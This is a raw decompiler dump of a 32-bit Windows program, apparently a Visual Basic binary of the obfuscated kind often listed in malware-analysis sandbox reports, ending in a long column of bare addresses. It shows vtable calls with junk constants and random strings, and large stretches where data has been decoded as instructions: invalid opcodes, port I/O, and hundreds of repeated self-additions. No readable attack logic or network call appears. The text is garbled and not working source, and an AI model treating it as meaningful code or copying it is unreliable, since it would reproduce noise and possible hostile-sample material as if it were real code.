										if(_v184 >= 0) {
											_t590 =  &_v268;
											 *_t590 = _v268 & 0x00000000;
											__eflags =  *_t590;
										} else {
											_push(0x728);
											_push(0x40259c);
											_push(_a4);
											_push(_v184);
											L004016B2();
											_v268 = _t1036;
										}
										_v104 = _v136;
										 *((intOrPtr*)( *_a4 + 0x778))(_a4);
										_v136 = 0x6da8;
										_t1163 =  &_v124;
										L004016A6();
										_v156 = 0x2cc3e3;
										 *_t1250 =  *0x4011a0;
										 *_t1250 =  *0x401198;
										 *((intOrPtr*)( *_a4 + 0x77c))(_a4,  &_v156, _t1163, _t1163,  &_v124, _t1163,  &_v136);
										L0040169A();
										_v136 = 0xb3e;
										 *((intOrPtr*)( *_a4 + 0x780))(_a4, 0x4ff843, L"ACROMIOCLAVICULAR",  &_v136, 0x6800);
										_v160 =  *0x401190;
										_t1165 =  &_v124;
										L004016A6();
										_v180 =  *0x401188;
										_v156 =  *0x401184;
										_v172 = 0xb7b19540;
										_v168 = 0x5b06;
										_v136 = 0x435;
										 *_t1250 =  *0x401180;
										 *_t1250 =  *0x401178;
										_t1060 =  *((intOrPtr*)( *_a4 + 0x72c))(_a4,  &_v136,  &_v172,  &_v156, 0xb598d620, 0x5b00,  &_v180, _t1165, _t1165,  &_v124, _t1165,  &_v160,  &_v164);
										_v184 = _t1060;
										__eflags = _v184;
										if(_v184 >= 0) {
											_t634 =  &_v272;
											 *_t634 = _v272 & 0x00000000;
											__eflags =  *_t634;
										} else {
											_push(0x72c);
											_push(0x40259c);
											_push(_a4);
											_push(_v184);
											L004016B2();
											_v272 = _t1060;
										}
										_v80 = _v164;
										_t1166 =  &_v124;
										L0040169A();
										 *((intOrPtr*)( *_a4 + 0x784))(_a4);
										_t1067 =  *((intOrPtr*)( *_a4 + 0x730))(_a4);
										_v184 = _t1067;
										__eflags = _v184;
										if(_v184 >= 0) {
											_t650 =  &_v276;
											 *_t650 = _v276 & 0x00000000;
											__eflags =  *_t650;
										} else {
											_push(0x730);
											_push(0x40259c);
											_push(_a4);
											_push(_v184);
											L004016B2();
											_v276 = _t1067;
										}
										 *_t1250 =  *0x401174;
										 *((intOrPtr*)( *_a4 + 0x788))(_a4, _t1166, 0x5d86fe);
										_v156 =  *0x401170;
										_v136 = 0x61ea;
										_t1075 =  *((intOrPtr*)( *_a4 + 0x734))(_a4,  &_v136,  &_v156, 0x60a7, 0x183aac);
										_v184 = _t1075;
										__eflags = _v184;
										if(_v184 >= 0) {
											_t667 =  &_v280;
											 *_t667 = _v280 & 0x00000000;
											__eflags =  *_t667;
										} else {
											_push(0x734);
											_push(0x40259c);
											_push(_a4);
											_push(_v184);
											L004016B2();
											_v280 = _t1075;
										}
										_v136 = 0x48e2;
										L004016A6();
										_t1080 =  *((intOrPtr*)( *_a4 + 0x738))(_a4, L"UNGDOMSFNGSELS",  &_v124, 0x6da9aa, 0x1b6865, 0x81a23630, 0x5afc, 0x737aa,  &_v136);
										_v184 = _t1080;
										__eflags = _v184;
										if(_v184 >= 0) {
											_t681 =  &_v284;
											 *_t681 = _v284 & 0x00000000;
											__eflags =  *_t681;
										} else {
											_push(0x738);
											_push(0x40259c);
											_push(_a4);
											_push(_v184);
											L004016B2();
											_v284 = _t1080;
										}
										L0040169A();
										_v156 =  *0x4011f0;
										 *((intOrPtr*)( *_a4 + 0x78c))(_a4,  &_v156, 0x61043c,  &_v172);
										_v44 = _v172;
										_v136 = 0x4ecb;
										_v172 =  *0x401168;
										 *_t1250 =  *0x401160;
										_t1090 =  *((intOrPtr*)( *_a4 + 0x73c))(_a4,  &_v172,  &_v124, 0xfedb0060, 0x5af6, 0x64e5,  &_v136, 0x22ad);
										_v184 = _t1090;
										__eflags = _v184;
										if(_v184 >= 0) {
											_t704 =  &_v288;
											 *_t704 = _v288 & 0x00000000;
											__eflags =  *_t704;
										} else {
											_push(0x73c);
											_push(0x40259c);
											_push(_a4);
											_push(_v184);
											L004016B2();
											_v288 = _t1090;
										}
										_t1169 =  &_v124;
										L004016A6();
										_v136 = 0x214d;
										_v156 = 0x665416;
										_v172 =  *0x401158;
										 *_t1250 =  *0x401150;
										 *_t1250 =  *0x401148;
										_t1097 =  *((intOrPtr*)( *_a4 + 0x740))(_a4,  &_v172,  &_v156, _t1169, _t1169,  &_v136, _t1169, _t1169,  &_v124, 0x3b8b);
										_v184 = _t1097;
										__eflags = _v184;
										if(_v184 >= 0) {
											_t722 =  &_v292;
											 *_t722 = _v292 & 0x00000000;
											__eflags =  *_t722;
										} else {
											_push(0x740);
											_push(0x40259c);
											_push(_a4);
											_push(_v184);
											L004016B2();
											_v292 = _t1097;
										}
										L0040169A();
										_t1100 =  *((intOrPtr*)( *_a4 + 0x1bc))(_a4, 0);
										asm("fclex");
										_v184 = _t1100;
										__eflags = _v184;
										if(_v184 >= 0) {
											_t733 =  &_v296;
											 *_t733 = _v296 & 0x00000000;
											__eflags =  *_t733;
										} else {
											_push(0x1bc);
											_push(0x40256c);
											_push(_a4);
											_push(_v184);
											L004016B2();
											_v296 = _t1100;
										}
										_t1104 =  *((intOrPtr*)( *_a4 + 0x790))(_a4,  &_v156);
										_v8 = 0;
										asm("wait");
										_push(0x40fd69);
										return _t1104;
									}
									_push(_t1180);
									if(__eflags < 0) {
										goto L52;
									}
									asm("popad");
									if(__eflags == 0) {
										goto L53;
									}
									if(__eflags < 0) {
										L50:
										 *_t803 =  *_t803 + _t803;
										 *_t803 =  *_t803 + _t803;
										 *_t803 =  *_t803 + _t803;
										 *_t803 =  *_t803 + _t803;
										 *_t803 =  *_t803 + _t803;
										__eflags =  *_t803;
										if( *_t803 < 0) {
											goto L58;
										}
										goto L51;
									}
									__eflags = _t1180[0x2e] * 0x61746144;
									L41:
									if(__eflags == 0) {
										goto L54;
									}
									_push(_t1180);
									if(__eflags < 0) {
										goto L55;
									}
									asm("popad");
									if(__eflags == 0) {
										goto L56;
									}
									L44:
									if (__eflags < 0) goto L45;
									asm("popad");
									if(__eflags == 0) {
										goto L57;
									} else {
										_push(_t1180);
										if(__eflags < 0) {
											goto L59;
										}
										asm("popad");
										if(__eflags == 0) {
											goto L60;
										}
										if (__eflags < 0) goto L49;
										_t1139 = _t1137 - 1;
										_t1119 = _t803 +  *_t803;
										 *((intOrPtr*)(_t1139 + 1)) =  *((intOrPtr*)(_t1139 + 1)) + _t1147;
										 *_t1119 =  *_t1119 + _t1119;
										_t1121 = _t1119 + _t1119 &  *(_t1119 + _t1119);
										 *_t1121 =  *_t1121 + _t1121;
										 *_t1121 =  *_t1121 + _t1121;
										asm("in al, 0x40");
										_t1140 = _t1139 + _t1139;
										asm("invalid");
										 *_t1121 =  *_t1121 + 1;
										 *_t1121 =  *_t1121 + _t1121;
										 *_t1121 =  *_t1121 + _t1140;
										_t1122 = _t1121 & 0x00000040;
										 *_t1122 =  *_t1122 + _t1147;
										 *_t1147 =  *_t1147 ^ _t1122;
										 *_t1122 =  *_t1122 + _t1122;
										 *_t1122 =  *_t1122 + _t1122;
										_t803 = _t1122 - 1;
										_t1137 = _t1140 + 1;
										__eflags = _t1137;
										_push(0);
										goto L50;
									}
								}
								_push(_t1137);
								asm("outsd");
								if(__eflags != 0) {
									goto L36;
								}
								asm("arpl [ebp], sp");
								asm("popad");
								if(__eflags == 0) {
									goto L35;
								}
								_t1228 =  &_v1;
								asm("gs insd");
								asm("bound esp, [ebp+0x72]");
								 *((intOrPtr*)(_t1147 + 0x74)) =  *((intOrPtr*)(_t1147 + 0x74)) + _t803;
								asm("popad");
								__eflags = 0x449a3cb1;
								asm("outsd");
								if(0x449a3cb1 < 0) {
									goto L41;
								}
								asm("popad");
								if(0x449a3cb1 == 0) {
									goto L44;
								}
								 *_t1137 =  *_t1137 + _t803;
								_t1180 =  &(_t1180[1]);
								 *0x449a3cb1 =  *0x449a3cb1 + _t1180;
								 *_t1180 =  *_t1180 + _t803;
								_t1123 = _t803 ^  *_t803;
								_t1137 =  &(_t1137[0]);
								 *_t1147 =  *_t1147 + 0x60;
								 *_t1123 =  *_t1123 + _t1180;
								 *0x39004500 =  *0x39004500 + _t1147;
								 *_t1180 =  &(_t1180[ *_t1180]);
								 *_t1204 =  *_t1204 + _t1180;
								 *0x31003100 =  *0x31003100 + _t1147;
								 *((intOrPtr*)(_t1123 + _t1123 + 0x31)) =  *((intOrPtr*)(_t1123 + _t1123 + 0x31)) + _t1123;
								 *0x43003800 =  *0x43003800 + _t1147;
								 *_t1147 =  &(_t1180[ *_t1147]);
								 *_t1180 =  *_t1180 + _t1123;
								_t803 = _t1123 - 0x30003000;
								 *_t803 =  &(_t1180[ *_t803]);
								 *_t803 =  &(_t1180[ *_t803]);
								 *0x449A3CB1 =  *((intOrPtr*)(0x449a3cb1)) + _t803;
								__eflags =  *_t803 - _t803;
								asm("aaa");
								 *0x44003400 =  &(_t1180[ *0x44003400]);
								__eflags =  *0x44003400;
								goto L34;
							}
							 *0x89994ead =  *0x89994ead + _t1142;
							asm("rol byte [eax+esi*8-0x62], 0x5a");
							L24:
							asm("sahf");
							_pop(_t1175);
							 *0 = _t756;
							 *_t756 =  *_t756 + _t756;
							 *_t756 =  *_t756 + _t756;
							 *_t756 =  *_t756 + _t756;
							 *_t756 =  *_t756 + _t756;
							 *_t756 =  *_t756 + _t756;
							 *_t756 =  *_t756 + _t756;
							 *_t756 =  *_t756 + _t756;
							 *_t756 =  *_t756 + _t756;
							 *_t1142 =  *_t1142 + _t756;
							 *_t756 =  *_t756 + _t756;
							 *_t756 =  *_t756 + _t756;
							 *_t756 =  *_t756 + _t756;
							 *_t756 =  *_t756 + _t756;
							 *_t756 =  *_t756 + _t756;
							 *_t756 =  *_t756 + _t756;
							 *_t756 =  *_t756 + _t756;
							 *_t756 =  *_t756 + _t756;
							 *_t756 =  *_t756 + _t756;
							 *_t756 =  *_t756 + _t756;
							 *_t756 =  *_t756 + _t756;
							_t1204 = 0xad;
							 *_t756 =  *_t756 + _t756;
							 *_t756 =  *_t756 + _t756;
							_t1124 = _t756 ^  *_t756;
							asm("pushfd");
							 *_t1124 =  *_t1124 + _t1124;
							_t756 = _t1124 + _t1175;
							 *_t756 =  *_t756 + _t756;
							__eflags =  *_t756;
							goto L25;
						}
						asm("outsb");
						_t30 = _t1142 + 0x70;
						 *_t30 =  *(_t1142 + 0x70) + _t756;
						__eflags =  *_t30;
						if( *_t30 < 0) {
							goto L24;
						}
						 *_t756 =  *_t756 + _t756;
						_t1132 = _t1132 - 1;
						asm("popad");
						_t1209 =  *(_t1225 + 0x73 + _t1209 * 2) * 0x70;
						__eflags = _t1209;
						asm("insb");
						asm("popad");
						asm("outsb");
						if(__eflags == 0) {
							goto L24;
						}
						asm("outsb");
						if(__eflags < 0) {
							 *_t756 =  *_t756 + _t1175;
							 *_t756 =  *_t756 + _t756;
							asm("lodsb");
							asm("invalid");
							asm("cmpsd");
							asm("stosd");
							_t1142 = 0xfbff5af0;
							_t756 = _t756 - 0x19 + 0x3d;
							_pop(_t1209);
							 *_t756 =  *_t756 + _t756;
							 *_t756 =  *_t756 + _t756;
							 *_t756 =  *_t756 + _t756;
							 *_t756 =  *_t756 + _t756;
							 *_t756 =  *_t756 + _t756;
							 *_t756 =  *_t756 + _t756;
							 *_t756 =  *_t756 + _t756;
							 *_t756 =  *_t756 + _t756;
							 *_t756 =  *_t756 + _t756;
							 *_t756 =  *_t756 + _t756;
							asm("adc [eax], al");
							 *_t756 =  *_t756 + _t756;
							 *_t756 =  *_t756 + _t756;
							 *_t756 =  *_t756 + _t756;
							 *_t756 =  *_t756 + _t756;
							 *_t756 =  *_t756 + _t756;
							 *_t756 =  *_t756 + _t756;
							__eflags =  *_t756;
						}
						 *_t756 =  *_t756 + _t756;
						 *_t756 =  *_t756 + _t756;
						 *_t756 =  *_t756 + _t756;
						 *_t756 =  *_t756 + _t756;
						 *_t756 =  *_t756 + _t756;
						__eflags =  *_t756;
						goto L19;
					}
				}
				asm("outsd");
				asm("outsb");
				 *0x746b614b =  *0x746b614b & __ebx;
				_t1254 =  *0x746b614b;
				if(_t1254 != 0) {
					goto L11;
				}
				if(_t1254 < 0) {
					goto L10;
				}
				asm("popad");
				asm("outsb");
				if(_t1254 == 0) {
					goto L9;
				}
				asm("outsb");
				if(_t1254 >= 0) {
					asm("pushad");
					asm("rcl dword [ebx], cl");
					 *_t743 =  *_t743 + _t743;
					 *_t743 =  *_t743 + _t743;
					 *_t743 =  *_t743 + _t743;
					 *_t743 =  *_t743 + _t743;
					 *_t743 =  *_t743 + _t743;
					 *_t743 =  *_t743 + _t743;
					 *_t743 =  *_t743 + _t743;
					 *_t743 =  *_t743 + _t743;
					 *_t743 =  *_t743 + _t743;
					 *_t743 =  *_t743 + _t743;
					 *_t743 =  *_t743 + _t743;
					 *_t743 =  *_t743 + _t743;
					__eflags =  *_t743;
					goto L8;
				}
				 *_t743 =  *_t743 + _t743;
				 *_t743 =  *_t743 + _t743;
				asm("int3");
				 *_t743 =  *_t743 ^ _t743;
				 *((intOrPtr*)(__ecx + __ebx + __ebx)) =  *((intOrPtr*)(__ecx + __ebx + __ebx)) + __ecx;
				asm("lodsb");
				asm("invalid");
				asm("cmpsd");
				asm("stosd");
				asm("iretd");
				 *((intOrPtr*)(_t743 + 0x4bf7340a)) = __edi;
				_t1127 =  *0xc39d2c13;
				return _t1127 - 0x9d;
			}













































































































































































































                                  0x004016d8
                                  0x004016d8
                                  0x004016d8
                                  0x004016d8
                                  0x004016d8
                                  0x004016dd
                                  0x004016e2
                                  0x004016e4
                                  0x004016e6
                                  0x004016e8
                                  0x004016ea
                                  0x004016ec
                                  0x004016ed
                                  0x004016ef
                                  0x004016f1
                                  0x004016f3
                                  0x004016f7
                                  0x004016fc
                                  0x004016fd
                                  0x004016fe
                                  0x00401702
                                  0x0040170c
                                  0x0040170e
                                  0x00401779
                                  0x00401779
                                  0x0040177b
                                  0x0040177d
                                  0x0040177f
                                  0x00401781
                                  0x00401782
                                  0x00401784
                                  0x00401784
                                  0x00401784
                                  0x00401785
                                  0x00401786
                                  0x00401786
                                  0x00401788
                                  0x00401788
                                  0x0040178a
                                  0x0040178d
                                  0x0040178d
                                  0x0040178e
                                  0x00401791
                                  0x00401799
                                  0x004017a2
                                  0x004017a3
                                  0x004017a6
                                  0x004017a7
                                  0x004017a8
                                  0x004017aa
                                  0x004017ad
                                  0x004017ae
                                  0x004017b0
                                  0x004017b2
                                  0x004017b3
                                  0x004017b5
                                  0x004017b8
                                  0x004017be
                                  0x004017bf
                                  0x004017c2
                                  0x004017c3
                                  0x004017c4
                                  0x004017c6
                                  0x004017c7
                                  0x004017c9
                                  0x004017ca
                                  0x004017d0
                                  0x004017d1
                                  0x004017d3
                                  0x004017d5
                                  0x004017d7
                                  0x004017dd
                                  0x004017e0
                                  0x004017e3
                                  0x004017e5
                                  0x004017eb
                                  0x004017ee
                                  0x004017f3
                                  0x004017f5
                                  0x004017f7
                                  0x004017f9
                                  0x004017fb
                                  0x004017fd
                                  0x004017ff
                                  0x00401802
                                  0x00401804
                                  0x00401806
                                  0x00401808
                                  0x0040180a
                                  0x0040180c
                                  0x0040180e
                                  0x00401810
                                  0x00401813
                                  0x00401815
                                  0x00401817
                                  0x00401819
                                  0x0040181b
                                  0x0040181d
                                  0x00401820
                                  0x00401822
                                  0x00401824
                                  0x00401826
                                  0x00401828
                                  0x0040182a
                                  0x0040182c
                                  0x0040182e
                                  0x0040182e
                                  0x00401832
                                  0x00401834
                                  0x00401839
                                  0x00401841
                                  0x00401843
                                  0x00401846
                                  0x00401848
                                  0x00401848
                                  0x0040184a
                                  0x0040184c
                                  0x0040184e
                                  0x00401850
                                  0x00401852
                                  0x00401854
                                  0x00401856
                                  0x00401858
                                  0x0040185a
                                  0x0040185c
                                  0x0040185e
                                  0x00401860
                                  0x00401862
                                  0x00401864
                                  0x00401864
                                  0x00401865
                                  0x00401866
                                  0x004018cf
                                  0x004018cf
                                  0x004018d1
                                  0x004018d2
                                  0x004018d3
                                  0x004018d3
                                  0x004018d3
                                  0x00000000
                                  0x00401868
                                  0x00401868
                                  0x0040186a
                                  0x0040186a
                                  0x0040186e
                                  0x004018d5
                                  0x004018d5
                                  0x004018d7
                                  0x004018da
                                  0x004018da
                                  0x004018dc
                                  0x004018c7
                                  0x004018c7
                                  0x004018cd
                                  0x004018cd
                                  0x00000000
                                  0x004018cd
                                  0x004018de
                                  0x0040192a
                                  0x0040192a
                                  0x0040192c
                                  0x0040192e
                                  0x0040192f
                                  0x00401931
                                  0x00401933
                                  0x00401935
                                  0x0040193c
                                  0x0040193f
                                  0x00401941
                                  0x00401944
                                  0x00401947
                                  0x00401949
                                  0x0040194c
                                  0x0040194e
                                  0x00401950
                                  0x00401952
                                  0x00401954
                                  0x00401956
                                  0x00401958
                                  0x0040195a
                                  0x0040195c
                                  0x0040195e
                                  0x00401960
                                  0x00401962
                                  0x00401964
                                  0x00401966
                                  0x00401968
                                  0x0040196a
                                  0x0040196c
                                  0x0040196e
                                  0x00401970
                                  0x00401972
                                  0x00401974
                                  0x00401976
                                  0x00401978
                                  0x0040197a
                                  0x0040197c
                                  0x0040197e
                                  0x00401980
                                  0x00401982
                                  0x00401984
                                  0x00401986
                                  0x00401988
                                  0x0040198a
                                  0x0040198c
                                  0x0040198e
                                  0x00401990
                                  0x00401992
                                  0x00401994
                                  0x00401996
                                  0x00401998
                                  0x0040199a
                                  0x0040199c
                                  0x0040199e
                                  0x004019a0
                                  0x004019a2
                                  0x004019a4
                                  0x004019a6
                                  0x004019a8
                                  0x004019aa
                                  0x004019ac
                                  0x004019ae
                                  0x004019b0
                                  0x004019b2
                                  0x004019b4
                                  0x004019b6
                                  0x004019b8
                                  0x004019ba
                                  0x004019bc
                                  0x004019be
                                  0x004019c0
                                  0x004019c2
                                  0x004019c4
                                  0x004019c6
                                  0x004019c8
                                  0x004019ca
                                  0x004019cc
                                  0x004019ce
                                  0x004019d0
                                  0x004019d2
                                  0x004019d4
                                  0x004019d6
                                  0x004019d8
                                  0x004019da
                                  0x004019dc
                                  0x004019de
                                  0x004019e0
                                  0x004019e2
                                  0x004019e4
                                  0x004019e6
                                  0x004019e8
                                  0x004019ea
                                  0x004019ec
                                  0x004019ee
                                  0x004019f0
                                  0x004019f2
                                  0x004019f4
                                  0x004019f6
                                  0x004019f8
                                  0x004019fa
                                  0x004019fc
                                  0x004019fe
                                  0x00401a00
                                  0x00401a02
                                  0x00401a04
                                  0x00401a06
                                  0x00401a08
                                  0x00401a0a
                                  0x00401a0c
                                  0x00401a0e
                                  0x00401a10
                                  0x00401a12
                                  0x00401a14
                                  0x00401a16
                                  0x00401a18
                                  0x00401a1a
                                  0x00401a1c
                                  0x00401a1e
                                  0x00401a20
                                  0x00401a22
                                  0x00401a24
                                  0x00401a26
                                  0x00401a28
                                  0x00401a2a
                                  0x00401a2c
                                  0x00401a2e
                                  0x00401a30
                                  0x00401a32
                                  0x00401a34
                                  0x00401a36
                                  0x00401a38
                                  0x00401a3a
                                  0x00401a3c
                                  0x00401a3e
                                  0x00401a40
                                  0x00401a42
                                  0x00401a44
                                  0x00401a46
                                  0x00401a48
                                  0x00401a4a
                                  0x00401a4c
                                  0x00401a4e
                                  0x00401a50
                                  0x00401a52
                                  0x00401a54
                                  0x00401a56
                                  0x00401a58
                                  0x00401a5a
                                  0x00401a5c
                                  0x00401a5e
                                  0x00401a60
                                  0x00401a62
                                  0x00401a64
                                  0x00401a66
                                  0x00401a68
                                  0x00401a6a
                                  0x00401a6c
                                  0x00401a6e
                                  0x00401a70
                                  0x00401a72
                                  0x00401a74
                                  0x00401a76
                                  0x00401a78
                                  0x00401a7a
                                  0x00401a7c
                                  0x00401a7e
                                  0x00401a80
                                  0x00401a82
                                  0x00401a84
                                  0x00401a86
                                  0x00401a88
                                  0x00401a8a
                                  0x00401a8c
                                  0x00401a8e
                                  0x00401a90
                                  0x00401a92
                                  0x00401a94
                                  0x00401a96
                                  0x00401a98
                                  0x00401a9a
                                  0x00401a9c
                                  0x00401a9e
                                  0x00401aa0
                                  0x00401aa2
                                  0x00401aa4
                                  0x00401aa6
                                  0x00401aa8
                                  0x00401aaa
                                  0x00401aac
                                  0x00401aae
                                  0x00401ab0
                                  0x00401ab2
                                  0x00401ab4
                                  0x00401ab6
                                  0x00401ab8
                                  0x00401aba
                                  0x00401abc
                                  0x00401abe
                                  0x00401ac0
                                  0x00401ac2
                                  0x00401ac4
                                  0x00401ac6
                                  0x00401ac8
                                  0x00401aca
                                  0x00401acc
                                  0x00401ace
                                  0x00401ad0
                                  0x00401ad2
                                  0x00401ad4
                                  0x00401ad6
                                  0x00401ad8
                                  0x00401ada
                                  0x00401adc
                                  0x00401ade
                                  0x00401ae0
                                  0x00401ae2
                                  0x00401ae4
                                  0x00401ae6
                                  0x00401ae8
                                  0x00401aea
                                  0x00401aec
                                  0x00401aee
                                  0x00401af0
                                  0x00401af2
                                  0x00401af4
                                  0x00401af6
                                  0x00401af8
                                  0x00401afa
                                  0x00401afc
                                  0x00401afe
                                  0x00401b00
                                  0x00401b02
                                  0x00401b04
                                  0x00401b06
                                  0x00401b08
                                  0x00401b0a
                                  0x00401b0c
                                  0x00401b0e
                                  0x00401b10
                                  0x00401b12
                                  0x00401b14
                                  0x00401b16
                                  0x00401b18
                                  0x00401b1a
                                  0x00401b1c
                                  0x00401b1e
                                  0x00401b20
                                  0x00401b22
                                  0x00401b24
                                  0x00401b26
                                  0x00401b28
                                  0x00401b2a
                                  0x00401b2c
                                  0x00401b2e
                                  0x00401b30
                                  0x00401b32
                                  0x00401b34
                                  0x00401b36
                                  0x00401b38
                                  0x00401b3a
                                  0x00401b3c
                                  0x00401b3e
                                  0x00401b40
                                  0x00401b42
                                  0x00401b44
                                  0x00401b46
                                  0x00401b48
                                  0x00401b4a
                                  0x00401b4c
                                  0x00401b4e
                                  0x00401b50
                                  0x00401b52
                                  0x00401b54
                                  0x00401b56
                                  0x00401b58
                                  0x00401b5a
                                  0x00401b5c
                                  0x00401b5e
                                  0x00401b5f
                                  0x00401b61
                                  0x00401b63
                                  0x00401b65
                                  0x00401b69
                                  0x00401b6c
                                  0x00401b6e
                                  0x00401b70
                                  0x00401b71
                                  0x00401b73
                                  0x00401b75
                                  0x00401b77
                                  0x00401b79
                                  0x00401b7b
                                  0x00401b7e
                                  0x00401b7f
                                  0x00401b82
                                  0x00401b83
                                  0x00401b85
                                  0x00401b87
                                  0x00401b8c
                                  0x00401b8e
                                  0x00401b90
                                  0x00401b92
                                  0x00401b94
                                  0x00401b96
                                  0x00401b98
                                  0x00401b9a
                                  0x00401b9b
                                  0x00401b9d
                                  0x00401b9f
                                  0x00401ba1
                                  0x00401ba4
                                  0x00401ba6
                                  0x00401ba8
                                  0x00401baa
                                  0x00401bab
                                  0x00401bad
                                  0x00401baf
                                  0x00401bb1
                                  0x00401bb4
                                  0x00401bb6
                                  0x00401bb8
                                  0x00401bba
                                  0x00401bbb
                                  0x00401bbd
                                  0x00401bbf
                                  0x00401bc1
                                  0x00401bc4
                                  0x00401bcd
                                  0x00401bcf
                                  0x00401bd2
                                  0x00401bd3
                                  0x00401bd5
                                  0x00401bd7
                                  0x00401bda
                                  0x00401bdb
                                  0x00401bdf
                                  0x00401be2
                                  0x00401be3
                                  0x00401beb
                                  0x00401bee
                                  0x00401bef
                                  0x00401bf1
                                  0x00401bf3
                                  0x00401bf5
                                  0x00401bf7
                                  0x00401bf9
                                  0x00401bfb
                                  0x00401bff
                                  0x00401c01
                                  0x00401c02
                                  0x00401c03
                                  0x00401c06
                                  0x00401c07
                                  0x00401c09
                                  0x00401c0b
                                  0x00401c0e
                                  0x00401c0f
                                  0x00401c11
                                  0x00401c13
                                  0x00401c17
                                  0x00401c19
                                  0x00401c1b
                                  0x00401c1d
                                  0x00401c1f
                                  0x00401c21
                                  0x00401c23
                                  0x00401c29
                                  0x00401c2a
                                  0x00401c2b
                                  0x00401c2f
                                  0x00401c31
                                  0x00401c33
                                  0x00401c36
                                  0x00401c37
                                  0x00401c3a
                                  0x00401c3c
                                  0x00401c3d
                                  0x00401c42
                                  0x00401c44
                                  0x00401c46
                                  0x00401c48
                                  0x00401c4a
                                  0x00401c4c
                                  0x00401c4e
                                  0x00401c4f
                                  0x00401c55
                                  0x00401c5a
                                  0x00401c5c
                                  0x00401c5e
                                  0x00401c60
                                  0x00401c62
                                  0x00401c63
                                  0x00401c67
                                  0x00401c6d
                                  0x00401c71
                                  0x00401c72
                                  0x00401c73
                                  0x00401c75
                                  0x00401c77
                                  0x00401c79
                                  0x00401c7b
                                  0x00401c7d
                                  0x00401c7f
                                  0x00401c81
                                  0x00401c83
                                  0x00401c85
                                  0x00401c87
                                  0x00401c89
                                  0x00401c8b
                                  0x00401c8d
                                  0x00401c8f
                                  0x00401c91
                                  0x00401c93
                                  0x00401c95
                                  0x00401c97
                                  0x00401c99
                                  0x00401c9b
                                  0x00401c9d
                                  0x00401c9f
                                  0x00401ca1
                                  0x00401ca3
                                  0x00401ca5
                                  0x00401ca7
                                  0x00401ca9
                                  0x00401cab
                                  0x00401cae
                                  0x00401caf
                                  0x00401cb3
                                  0x00401cb9
                                  0x00401cbb
                                  0x00401cbd
                                  0x00401cbe
                                  0x00401cbf
                                  0x00401cc1
                                  0x00401cc3
                                  0x00401cc5
                                  0x00401cc7
                                  0x00401cc9
                                  0x00401ccb
                                  0x00401ccd
                                  0x00401ccf
                                  0x00401cd1
                                  0x00401cd3
                                  0x00401cd5
                                  0x00401cd7
                                  0x00401cd9
                                  0x00401cdb
                                  0x00401cdd
                                  0x00401cdf
                                  0x00401ce1
                                  0x00401ce3
                                  0x00401ce5
                                  0x00401ce7
                                  0x00401ce9
                                  0x00401ceb
                                  0x00401ced
                                  0x00401cef
                                  0x00401cf1
                                  0x00401cf3
                                  0x00401cf5
                                  0x00401cf7
                                  0x00401cf9
                                  0x00401cfb
                                  0x00401cfd
                                  0x00401cff
                                  0x00401d01
                                  0x00401d03
                                  0x00401d05
                                  0x00401d07
                                  0x00401d09
                                  0x00401d0b
                                  0x00401d0d
                                  0x00401d0f
                                  0x00401d11
                                  0x00401d13
                                  0x00401d15
                                  0x00401d17
                                  0x00401d19
                                  0x00401d1b
                                  0x00401d1d
                                  0x00401d1f
                                  0x00401d22
                                  0x00401d23
                                  0x00401d27
                                  0x00401d2d
                                  0x00401d2f
                                  0x00401d31
                                  0x00401d32
                                  0x00401d33
                                  0x00401d35
                                  0x00401d37
                                  0x00401d39
                                  0x00401d3b
                                  0x00401d3d
                                  0x00401d3f
                                  0x00401d41
                                  0x00401d43
                                  0x00401d45
                                  0x00401d47
                                  0x00401d49
                                  0x00401d4b
                                  0x00401d4d
                                  0x00401d4f
                                  0x00401d51
                                  0x00401d53
                                  0x00401d55
                                  0x00401d57
                                  0x00401d59
                                  0x00401d5b
                                  0x00401d5d
                                  0x00401d5f
                                  0x00401d61
                                  0x00401d63
                                  0x00401d65
                                  0x00401d67
                                  0x00401d69
                                  0x00401d6b
                                  0x00401d6d
                                  0x00401d6f
                                  0x00401d71
                                  0x00401d73
                                  0x00401d75
                                  0x00401d77
                                  0x00401d79
                                  0x00401d7b
                                  0x00401d7d
                                  0x00401d7f
                                  0x00401d81
                                  0x00401d83
                                  0x00401d85
                                  0x00401d87
                                  0x00401d89
                                  0x00401d8b
                                  0x00401d8d
                                  0x00401d8f
                                  0x00401d91
                                  0x00401d93
                                  0x00401d95
                                  0x00401d97
                                  0x00401d99
                                  0x00401d9b
                                  0x00401d9d
                                  0x00401d9f
                                  0x00401da1
                                  0x00401da3
                                  0x00401da5
                                  0x00401da7
                                  0x00401da9
                                  0x00401dab
                                  0x00401dad
                                  0x00401daf
                                  0x00401daf
                                  0x00401daf
                                  0x00401db0
                                  0x00401db1
                                  0x00401db3
                                  0x00401db5
                                  0x00401db7
                                  0x00401db9
                                  0x00401dbb
                                  0x00401dbd
                                  0x00401dbf
                                  0x00401dc1
                                  0x00401dc3
                                  0x00401dc5
                                  0x00401dc5
                                  0x00401dc6
                                  0x00401dc6
                                  0x00401dc8
                                  0x00401dc9
                                  0x00401dcb
                                  0x00401dcd
                                  0x00401dcf
                                  0x00401dd2
                                  0x00401dd4
                                  0x00401dd6
                                  0x00401dd8
                                  0x00401dda
                                  0x00401ddc
                                  0x00401ddf
                                  0x00401de1
                                  0x00401de3
                                  0x00401de5
                                  0x00401de7
                                  0x00401dea
                                  0x00401deb
                                  0x00401dec
                                  0x00401df2
                                  0x00401df8
                                  0x00401dfa
                                  0x00401dfb
                                  0x00401dfc
                                  0x00401e02
                                  0x00401e02
                                  0x00401e02
                                  0x00401e08
                                  0x00401e08
                                  0x00401e0b
                                  0x00401e0c
                                  0x00401e12
                                  0x00401e1a
                                  0x00401e22
                                  0x00401e24
                                  0x00401e25
                                  0x00401e2a
                                  0x00401e2e
                                  0x00401e31
                                  0x00401e34
                                  0x00401e35
                                  0x00401e36
                                  0x00401e3c
                                  0x00401e3e
                                  0x00401e40
                                  0x00401e43
                                  0x00401e45
                                  0x00401e47
                                  0x00401e4d
                                  0x00401e52
                                  0x00401e58
                                  0x00401e5b
                                  0x00401e62
                                  0x00401e63
                                  0x00401e67
                                  0x00401e67
                                  0x00401e68
                                  0x00401e6a
                                  0x00401e6c
                                  0x00401e6e
                                  0x00401e6f
                                  0x00401e71
                                  0x00401e73
                                  0x00401e75
                                  0x00401e77
                                  0x00401e79
                                  0x00401e7b
                                  0x00401e7d
                                  0x00401e7f
                                  0x00401e81
                                  0x00401e83
                                  0x00401e85
                                  0x00401e88
                                  0x00401e8a
                                  0x00401e8c
                                  0x00401e8e
                                  0x00401e90
                                  0x00401e92
                                  0x00401e94
                                  0x00401e96
                                  0x00401e98
                                  0x00401e9a
